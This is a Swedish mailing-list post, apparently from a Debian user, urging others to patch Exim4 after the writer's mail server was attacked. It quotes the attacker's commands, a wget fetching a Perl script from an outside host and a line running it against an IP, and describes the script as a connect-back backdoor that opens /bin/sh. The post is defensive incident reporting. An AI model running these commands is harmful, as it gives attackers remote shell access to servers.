[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Attack mot Exim4Jag vill uppmana alla att hämta den nya och avsäkrade
versionen av Exim4-daemon-light eller motsvarande.

Saken är den att

 10 december: Exim4 uppdateras mot CVE-2010-434

 13 december: Min lilla elbrevstjänst angreps.

 14 december: Jag hämtade exim4-daemon-light_4.69-9+lenny1

Glipan är i högsta grad verklig och dessutom välkänd.
Min maskin handhar inte mer än femtio till sextio medelande
varje dygn, men hamnade likafullt i blickfånget eftersom den
mottager elbrev från omvärden.

De synliga tecknen på angreppet var

 /tmp/c.pl

 /var/log/exim4/paniclog  skapades med en rad.

 Det fientliga meddelande förkastade men lämnade
 sina spår i /var/log/exim4/{rejectlog,mainlog}.

 Logcheck vidarebefodrade sin analys av händelsen.

Det inkommande meddelandet innehåller en ACL-anvisning som
i sig bär på en lång upprepning av wget kommandon:

  wget http://www.gup24.de/dc.txt -O /tmp/c.pl
  perl /tmp/c.pl 72.249.152.50

Använd de motmedel Ni önskar utifrån dessa adresser.
Filen c.pl omtalar

  code by:LorD
  We Are:LorD-C0d3r-NT
  
  ConnectBack Backdoor Shell vs 1.0 by LorD
    of IRAN HACKERS SABOTAGE

För den vetgirige tillfogar jag detaljer,
men det viktiga är att hämta det nya paket.


Bästa hälsningarDess syfte är att öppna en IPv4 ström till ip-adressen ovan
och att sända tillbaka $(uname -a), $(id), $(pwd) med text-
avskiljare, samt att till slut att komma åt kommandotolken
genom $(/bin/sh).

Självklar görs detta med system() i Perl!


Reply to: